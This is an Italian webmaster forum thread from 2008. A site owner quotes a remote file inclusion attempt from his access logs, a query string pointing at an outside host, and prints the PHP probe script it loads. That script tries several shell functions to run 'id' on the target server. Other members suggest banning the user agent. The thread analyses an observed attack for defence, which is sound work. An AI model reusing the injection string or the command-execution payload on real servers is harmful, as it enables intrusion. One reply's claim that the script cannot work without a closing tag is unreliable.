Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

[PHP] - Cosa fa questo script ?

Cerchi consigli per migliorare il tuo sito? Vuoi aprire un sito in poco tempo?
Discuti con altri webmaster, chiedi chiarimenti ed opinioni in tutta libertà.
Lo spam verrà cancellato.

[PHP] - Cosa fa questo script ?

Messaggioda gialloporpora » dom gen 27, 2008 1:26 pm

ho iniziato a tracciare gli user agent per avere un'idea degli user agent in circolazione e creare da me uno script per l'autodetection del browser/bot senza riccorrere allo script che ho trovato in rete che non è un granchè.

Guardando il log file ho visto che c'era un user agent sospetto (tale libww-perl) e ho quindi deciso di tener traccia delle query string per capire cosa stesse cercando di combinare, questo è un estratto del log:
Codice: Seleziona tutto
libwww-p|erl
Query string= _CONF[path]=http://www.ccdsm.net/id?


Lo metto nei tag code in modo il link non sia cliccabile, seguendo il link della query string:

Codice: Seleziona tutto
<?php
echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;



Qualcuno ha una vaga idea di cosa sta cercando di fare questo script ?
Secondo me nulla di buono e difatti ho una mezza idea di bannare il libwww-perl [bleh]

Altra domanda, oltre alla query string ci sono altre informazioni che possono essere utili per capire cosa stanno tentando di fare ? (l'IP lo traccio già per eventuali segnalazioni a chi di dovere ma non lo metto)
Ciao
Albert Einstein: « 10 cose sono infinite: l'universo e la stupidità umana ma sull'universo nutro ancora dubbi »
Avatar utente
gialloporpora
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 1780
Iscritto il: mer lug 27, 2005 11:55 pm

Messaggioda Fred » dom gen 27, 2008 3:05 pm

Se il nome è corretto non lo so, ma se per caso ti sei scordato una w io sul web ho trovato questo http://iblog.webprojectsolution.com/200 ... prio-blog/
inoltre prova a carcare libwww-perl su google
Asus M3N78SE;AMD Athlon 64X2 5200+@5400;2 GB DDR2;NVIDIA GeForce 9500GT;Windows 7 Pro 64bit;
AcerASPIRE5230;Windows 7 Pro 64bit
Skype: nellopc90
Avatar utente
Fred
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3623
Iscritto il: mer apr 27, 2005 4:13 pm
Località: Urbe

Messaggioda Fred » dom gen 27, 2008 6:02 pm

Non so, ripeto che non ne capisco molto... m non si dovrebbe chiudere con" ?> ". Se ci prendo credo che ancora non abbia fatto danni perché non è funzionante. Io lo eliminerei. [;)] [;)] [;)]
Asus M3N78SE;AMD Athlon 64X2 5200+@5400;2 GB DDR2;NVIDIA GeForce 9500GT;Windows 7 Pro 64bit;
AcerASPIRE5230;Windows 7 Pro 64bit
Skype: nellopc90
Avatar utente
Fred
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3623
Iscritto il: mer apr 27, 2005 4:13 pm
Località: Urbe

Messaggioda gialloporpora » dom gen 27, 2008 6:41 pm

Grazie per le risposte,
comunque come bannare i libwww-perl lo avevo letto sul blog di Casper:
http://www.casperize.com/prove-tecniche-di-intrusione/

e so come farlo, quello che vorrei sapere è capire cosa tenta di fare quello script.. Nulla di buono, credo [bleh]

Ciao
Albert Einstein: « 10 cose sono infinite: l'universo e la stupidità umana ma sull'universo nutro ancora dubbi »
Avatar utente
gialloporpora
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 1780
Iscritto il: mer lug 27, 2005 11:55 pm

Messaggioda Fred » dom gen 27, 2008 6:44 pm

Per la curiosità è scritto qui, nel tuo post. Ripeto: io lo eliminerei prima che lo "chiudano" e cominci a fare danni.
Asus M3N78SE;AMD Athlon 64X2 5200+@5400;2 GB DDR2;NVIDIA GeForce 9500GT;Windows 7 Pro 64bit;
AcerASPIRE5230;Windows 7 Pro 64bit
Skype: nellopc90
Avatar utente
Fred
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3623
Iscritto il: mer apr 27, 2005 4:13 pm
Località: Urbe


Torna a Sviluppo Web

Chi c’è in linea

Visitano il forum: Nessuno e 14 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising